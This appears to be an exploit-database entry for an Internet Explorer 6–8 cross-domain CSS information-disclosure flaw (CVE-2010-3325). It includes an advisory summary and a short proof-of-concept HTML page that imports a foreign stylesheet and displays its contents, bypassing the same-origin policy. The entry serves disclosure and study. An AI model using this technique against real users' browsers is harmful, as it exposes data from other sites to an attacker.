[] NeoSense

Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure

Author: Chris Evans
type: dos
platform: windows
port: 
date_added: 2010-09-06 
date_updated: 2014-09-09 
verified: 1 
codes: CVE-2010-3325;OSVDB-68547 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/42993/info

Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.

An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.

Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.

This issue affects Internet Explorer 6, 7, and 8.

<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>